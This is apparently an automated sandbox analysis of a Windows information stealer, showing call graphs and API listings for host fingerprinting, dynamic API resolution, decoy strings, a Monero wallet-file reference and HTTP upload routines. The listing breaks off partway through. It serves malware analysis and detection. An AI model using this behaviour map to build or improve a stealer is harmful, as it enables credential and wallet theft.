CharToOemW 15727->15847 15728->15091 15731 48a740 lstrcpy 15730->15731 15732 487bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15731->15732 15739 487c25 15732->15739 15733 487d18 15735 487d28 15733->15735 15736 487d1e LocalFree 15733->15736 15734 487c46 GetLocaleInfoA 15734->15739 15738 48a7a0 lstrcpy 15735->15738 15736->15735 15737 48a9b0 lstrcpy lstrlen lstrcpy lstrcat 15737->15739 15740 487d37 15738->15740 15739->15733 15739->15734 15739->15737 15741 48a8a0 lstrcpy 15739->15741 15740->15104 15741->15739 15743 482008 15742->15743 15743->15119 15745 489493 GetModuleFileNameExA CloseHandle 15744->15745 15746 4894b5 15744->15746 15745->15746 15747 48a740 lstrcpy 15746->15747 15748 482091 15747->15748 15748->15134 15750 487e68 RegQueryValueExA 15749->15750 15751 482119 15749->15751 15752 487e8e RegCloseKey 15750->15752 15751->15148 15752->15751 15754 487fb9 GetLogicalProcessorInformationEx 15753->15754 15755 487fd8 GetLastError 15754->15755 15756 488029 15754->15756 15764 488022 15755->15764 15765 487fe3 15755->15765 15760 4889f0 2 API calls 15756->15760 15759 4889f0 2 API calls 15762 482194 15759->15762 15761 48807b 15760->15761 15763 488084 wsprintfA 15761->15763 15761->15764 15762->15162 15763->15762 15764->15759 15764->15762 15765->15754 15765->15762 15848 4889f0 15765->15848 15851 488a10 GetProcessHeap RtlAllocateHeap 15765->15851 15767 48220f 15766->15767 15767->15176 15769 4889b0 15768->15769 15770 48814d GlobalMemoryStatusEx 15769->15770 15771 488163 __aulldiv 15770->15771 15772 48819b wsprintfA 15771->15772 15773 482289 15772->15773 15773->15190 15775 4887fb GetProcessHeap RtlAllocateHeap wsprintfA 15774->15775 15777 48a740 lstrcpy 15775->15777 15778 48230b 15777->15778 15778->15204 15780 48a740 lstrcpy 15779->15780 15782 488229 15780->15782 15781 488263 15783 48a7a0 lstrcpy 15781->15783 15782->15781 15784 48a9b0 lstrcpy lstrlen lstrcpy lstrcat 15782->15784 15786 48a8a0 lstrcpy 15782->15786 15785 4882dc 15783->15785 15784->15782 15785->15221 
15786->15782 15788 48a740 lstrcpy 15787->15788 15789 48835c RegOpenKeyExA 15788->15789 15790 4883ae 15789->15790 15791 4883d0 15789->15791 15792 48a7a0 lstrcpy 15790->15792 15793 4883f8 RegEnumKeyExA 15791->15793 15794 488613 RegCloseKey 15791->15794 15804 4883bd 15792->15804 15795 48860e 15793->15795 15796 48843f wsprintfA RegOpenKeyExA 15793->15796 15797 48a7a0 lstrcpy 15794->15797 15795->15794 15798 4884c1 RegQueryValueExA 15796->15798 15799 488485 RegCloseKey RegCloseKey 15796->15799 15797->15804 15801 4884fa lstrlen 15798->15801 15802 488601 RegCloseKey 15798->15802 15800 48a7a0 lstrcpy 15799->15800 15800->15804 15801->15802 15803 488510 15801->15803 15802->15795 15805 48a9b0 4 API calls 15803->15805 15804->15247 15806 488527 15805->15806 15807 48a8a0 lstrcpy 15806->15807 15808 488533 15807->15808 15809 48a9b0 4 API calls 15808->15809 15810 488557 15809->15810 15811 48a8a0 lstrcpy 15810->15811 15812 488563 15811->15812 15813 48856e RegQueryValueExA 15812->15813 15813->15802 15814 4885a3 15813->15814 15815 48a9b0 4 API calls 15814->15815 15816 4885ba 15815->15816 15817 48a8a0 lstrcpy 15816->15817 15818 4885c6 15817->15818 15819 48a9b0 4 API calls 15818->15819 15820 4885ea 15819->15820 15821 48a8a0 lstrcpy 15820->15821 15822 4885f6 15821->15822 15822->15802 15824 48a740 lstrcpy 15823->15824 15825 4886bc CreateToolhelp32Snapshot Process32First 15824->15825 15826 4886e8 Process32Next 15825->15826 15827 48875d CloseHandle 15825->15827 15826->15827 15832 4886fd 15826->15832 15828 48a7a0 lstrcpy 15827->15828 15830 488776 15828->15830 15829 48a9b0 lstrcpy lstrlen lstrcpy lstrcat 15829->15832 15830->15279 15831 48a8a0 lstrcpy 15831->15832 15832->15826 15832->15829 15832->15831 15834 48a7a0 lstrcpy 15833->15834 15835 4851b5 15834->15835 15836 471590 lstrcpy 15835->15836 15837 4851c6 15836->15837 15852 475100 15837->15852 15839 4851cf 15839->15291 15843 487720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15840->15843 15842 4876b9 15842->15715 15842->15716 15844 487780 
RegCloseKey 15843->15844 15845 487765 RegQueryValueExA 15843->15845 15846 487793 15844->15846 15845->15844 15846->15842 15847->15728 15849 4889f9 GetProcessHeap HeapFree 15848->15849 15850 488a0c 15848->15850 15849->15850 15850->15765 15851->15765 15853 48a7a0 lstrcpy 15852->15853 15854 475119 15853->15854 15855 4747b0 2 API calls 15854->15855 15856 475125 15855->15856 16012 488ea0 15856->16012 15858 475184 15859 475192 lstrlen 15858->15859 15860 4751a5 15859->15860 15861 488ea0 4 API calls 15860->15861 15862 4751b6 15861->15862 15863 48a740 lstrcpy 15862->15863 15864 4751c9 15863->15864 15865 48a740 lstrcpy 15864->15865 15866 4751d6 15865->15866 15867 48a740 lstrcpy 15866->15867 15868 4751e3 15867->15868 15869 48a740 lstrcpy 15868->15869 15870 4751f0 15869->15870 15871 48a740 lstrcpy 15870->15871 15872 4751fd InternetOpenA StrCmpCA 15871->15872 15873 47522f 15872->15873 15874 4758c4 InternetCloseHandle 15873->15874 15875 488b60 3 API calls 15873->15875 15881 4758d9 ctype 15874->15881 15876 47524e 15875->15876 15877 48a920 3 API calls 15876->15877 15878 475261 15877->15878 15879 48a8a0 lstrcpy 15878->15879 15880 47526a 15879->15880 15882 48a9b0 4 API calls 15880->15882 15885 48a7a0 lstrcpy 15881->15885 15883 4752ab 15882->15883 15884 48a920 3 API calls 15883->15884 15886 4752b2 15884->15886 15892 475913 15885->15892 15887 48a9b0 4 API calls 15886->15887 15888 4752b9 15887->15888 15889 48a8a0 lstrcpy 15888->15889 15890 4752c2 15889->15890 15891 48a9b0 4 API calls 15890->15891 15893 475303 15891->15893 15892->15839 15894 48a920 3 API calls 15893->15894 15895 47530a 15894->15895 15896 48a8a0 lstrcpy 15895->15896 15897 475313 15896->15897 15898 475329 InternetConnectA 15897->15898 15898->15874 15899 475359 HttpOpenRequestA 15898->15899 15901 4758b7 InternetCloseHandle 15899->15901 15902 4753b7 15899->15902 15901->15874 15903 48a9b0 4 API calls 15902->15903 15904 4753cb 15903->15904 15905 48a8a0 lstrcpy 15904->15905 15906 4753d4 15905->15906 15907 48a920 3 API calls 
15906->15907 15908 4753f2 15907->15908 15909 48a8a0 lstrcpy 15908->15909 15910 4753fb 15909->15910 15911 48a9b0 4 API calls 15910->15911 15912 47541a 15911->15912 15913 48a8a0 lstrcpy 15912->15913 15914 475423 15913->15914 15915 48a9b0 4 API calls 15914->15915 15916 475444 15915->15916 15917 48a8a0 lstrcpy 15916->15917 15918 47544d 15917->15918 15919 48a9b0 4 API calls 15918->15919 15920 47546e 15919->15920 15921 48a8a0 lstrcpy 15920->15921 16013 488ead CryptBinaryToStringA 16012->16013 16017 488ea9 16012->16017 16014 488ece GetProcessHeap RtlAllocateHeap 16013->16014 16013->16017 16015 488ef4 ctype 16014->16015 16014->16017 16016 488f05 CryptBinaryToStringA 16015->16016 16016->16017 16017->15858 16021->15294 16264 479880 16022->16264 16024 4798e1 16024->15301 16026 48a740 lstrcpy 16025->16026 16027 47fb16 16026->16027 16199 48a740 lstrcpy 16198->16199 16200 480266 16199->16200 16201 488de0 2 API calls 16200->16201 16202 48027b 16201->16202 16203 48a920 3 API calls 16202->16203 16204 48028b 16203->16204 16205 48a8a0 lstrcpy 16204->16205 16206 480294 16205->16206 16207 48a9b0 4 API calls 16206->16207 16208 4802b8 16207->16208 16209 48a8a0 lstrcpy 16208->16209 16265 47988e 16264->16265 16268 476fb0 16265->16268 16267 4798ad ctype 16267->16024 16271 476d40 16268->16271 16272 476d63 16271->16272 16280 476d59 16271->16280 16272->16280 16285 476660 16272->16285 16274 476dbe 16274->16280 16291 4769b0 16274->16291 16276 476e2a 16277 476ee6 VirtualFree 16276->16277 16279 476ef7 16276->16279 16276->16280 16277->16279 16278 476f41 16278->16280 16283 4889f0 2 API calls 16278->16283 16279->16278 16281 476f26 FreeLibrary 16279->16281 16282 476f38 16279->16282 16280->16267 16281->16279 16284 4889f0 2 API calls 16282->16284 16283->16280 16284->16278 16290 47668f VirtualAlloc 16285->16290 16287 476730 16288 476743 VirtualAlloc 16287->16288 16289 47673c 16287->16289 16288->16289 16289->16274 16290->16287 16290->16289 16292 4769c9 16291->16292 16297 4769d5 16291->16297 16293 476a09 
LoadLibraryA 16292->16293 16292->16297 16294 476a32 16293->16294 16293->16297 16295 476ae0 16294->16295 16301 488a10 GetProcessHeap RtlAllocateHeap 16294->16301 16295->16297 16298 476ba8 GetProcAddress 16295->16298 16297->16276 16298->16295 16298->16297 16299 4889f0 2 API calls 16299->16295 16300 476a8b 16300->16297 16300->16299 16301->16300

                    Control-flow Graph

                    control_flow_graph 660 489860-489874 call 489750 663 48987a-489a8e call 489780 GetProcAddress * 21 660->663 664 489a93-489af2 LoadLibraryA * 5 660->664 663->664 665 489b0d-489b14 664->665 666 489af4-489b08 GetProcAddress 664->666 668 489b46-489b4d 665->668 669 489b16-489b41 GetProcAddress * 2 665->669 666->665 671 489b68-489b6f 668->671 672 489b4f-489b63 GetProcAddress 668->672 669->668 673 489b89-489b90 671->673 674 489b71-489b84 GetProcAddress 671->674 672->671 675 489bc1-489bc2 673->675 676 489b92-489bbc GetProcAddress * 2 673->676 674->673 676->675
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,01232290), ref: 004898A1
                    • GetProcAddress.KERNEL32(74DD0000,01232188), ref: 004898BA
                    • GetProcAddress.KERNEL32(74DD0000,01232230), ref: 004898D2
                    • GetProcAddress.KERNEL32(74DD0000,012321B8), ref: 004898EA
                    • GetProcAddress.KERNEL32(74DD0000,012321E8), ref: 00489903
                    • GetProcAddress.KERNEL32(74DD0000,012391E0), ref: 0048991B
                    • GetProcAddress.KERNEL32(74DD0000,01225570), ref: 00489933
                    • GetProcAddress.KERNEL32(74DD0000,012255B0), ref: 0048994C
                    • GetProcAddress.KERNEL32(74DD0000,012322C0), ref: 00489964
                    • GetProcAddress.KERNEL32(74DD0000,012322A8), ref: 0048997C
                    • GetProcAddress.KERNEL32(74DD0000,01232308), ref: 00489995
                    • GetProcAddress.KERNEL32(74DD0000,012323F8), ref: 004899AD
                    • GetProcAddress.KERNEL32(74DD0000,012254D0), ref: 004899C5
                    • GetProcAddress.KERNEL32(74DD0000,01232428), ref: 004899DE
                    • GetProcAddress.KERNEL32(74DD0000,01232440), ref: 004899F6
                    • GetProcAddress.KERNEL32(74DD0000,012253F0), ref: 00489A0E
                    • GetProcAddress.KERNEL32(74DD0000,01232248), ref: 00489A27
                    • GetProcAddress.KERNEL32(74DD0000,01232320), ref: 00489A3F
                    • GetProcAddress.KERNEL32(74DD0000,012254B0), ref: 00489A57
                    • GetProcAddress.KERNEL32(74DD0000,01232200), ref: 00489A70
                    • GetProcAddress.KERNEL32(74DD0000,01225270), ref: 00489A88
                    • LoadLibraryA.KERNEL32(01232470,?,00486A00), ref: 00489A9A
                    • LoadLibraryA.KERNEL32(012324B8,?,00486A00), ref: 00489AAB
                    • LoadLibraryA.KERNEL32(012324E8,?,00486A00), ref: 00489ABD
                    • LoadLibraryA.KERNEL32(012324D0,?,00486A00), ref: 00489ACF
                    • LoadLibraryA.KERNEL32(01232500,?,00486A00), ref: 00489AE0
                    • GetProcAddress.KERNEL32(75A70000,01232518), ref: 00489B02
                    • GetProcAddress.KERNEL32(75290000,01232488), ref: 00489B23
                    • GetProcAddress.KERNEL32(75290000,012324A0), ref: 00489B3B
                    • GetProcAddress.KERNEL32(75BD0000,01232530), ref: 00489B5D
                    • GetProcAddress.KERNEL32(75450000,01225330), ref: 00489B7E
                    • GetProcAddress.KERNEL32(76E90000,012391F0), ref: 00489B9F
                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00489BB6
                    Strings
                    • NtQueryInformationProcess, xrefs: 00489BAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: NtQueryInformationProcess
                    • API String ID: 2238633743-2781105232
                    • Opcode ID: a8632c72287aa06a86cf23377a60eec1dce716b2093f76b9c3348ec54fa90702
                    • Instruction ID: 0980ea8ad3a16c80a65ccc6a8327482f3a3ecb070e0abfa151afcd480a9c68a3
                    • Opcode Fuzzy Hash: a8632c72287aa06a86cf23377a60eec1dce716b2093f76b9c3348ec54fa90702
                    • Instruction Fuzzy Hash: D2A14EF9514240AFD354EFE8ED889A637FBF74C301754672AE605C3664DA3A98C1CB12

                    Control-flow Graph

                    control_flow_graph 764 4745c0-474695 RtlAllocateHeap 781 4746a0-4746a6 764->781 782 47474f-4747a9 VirtualProtect 781->782 783 4746ac-47474a 781->783 783->781
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0047460F
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0047479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474643
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474622
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746CD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047474F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474729
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047477B
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746AC
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047471E
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474638
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047473F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745E8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746C2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474713
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745F3
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047475A
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746B7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745C7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474765
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474662
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745D2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746D8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047462D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474734
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745DD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474617
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474657
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474678
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474770
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047466D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474683
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 
Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was 
founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: c366365fbd4c20552f9db844f20ae531f2198c9141a68cf1602123f3fb2437e1
                    • Instruction ID: 0a9631802d410b619af4c19055ccc44c977520a5aa900cf921c791c692d2fc5f
                    • Opcode Fuzzy Hash: c366365fbd4c20552f9db844f20ae531f2198c9141a68cf1602123f3fb2437e1
                    • Instruction Fuzzy Hash: A04124606C2A046EEF35B7A58C46FDE7A52DFC3748F705072A8C452390CFB86506C7AA

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 801 474880-474942 call 48a7a0 call 4747b0 call 48a740 * 5 InternetOpenA StrCmpCA 816 474944 801->816 817 47494b-47494f 801->817 816->817 818 474955-474acd call 488b60 call 48a920 call 48a8a0 call 48a800 * 2 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a920 call 48a8a0 call 48a800 * 2 InternetConnectA 817->818 819 474ecb-474ef3 InternetCloseHandle call 48aad0 call 479ac0 817->819 818->819 905 474ad3-474ad7 818->905 829 474ef5-474f2d call 48a820 call 48a9b0 call 48a8a0 call 48a800 819->829 830 474f32-474fa2 call 488990 * 2 call 48a7a0 call 48a800 * 8 819->830 829->830 906 474ae5 905->906 907 474ad9-474ae3 905->907 908 474aef-474b22 HttpOpenRequestA 906->908 907->908 909 474ebe-474ec5 InternetCloseHandle 908->909 910 474b28-474e28 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a740 call 48a920 * 2 call 48a8a0 call 48a800 * 2 call 48aad0 lstrlen call 48aad0 * 2 lstrlen call 48aad0 HttpSendRequestA 908->910 909->819 1021 474e32-474e5c InternetReadFile 910->1021 1022 474e67-474eb9 InternetCloseHandle call 48a800 1021->1022 1023 474e5e-474e65 1021->1023 1022->909 1023->1022 1024 474e69-474ea7 call 48a9b0 call 48a8a0 call 48a800 1023->1024 1024->1021
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                      • Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00474915
                    • StrCmpCA.SHLWAPI(?,0123E858), ref: 0047493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00474ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00490DDB,00000000,?,?,00000000,?,",00000000,?,0123E908), ref: 00474DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00474E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00474E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00474E49
                    • InternetCloseHandle.WININET(00000000), ref: 00474EAD
                    • InternetCloseHandle.WININET(00000000), ref: 00474EC5
                    • HttpOpenRequestA.WININET(00000000,0123E778,?,0123E298,00000000,00000000,00400100,00000000), ref: 00474B15
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • InternetCloseHandle.WININET(00000000), ref: 00474ECF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
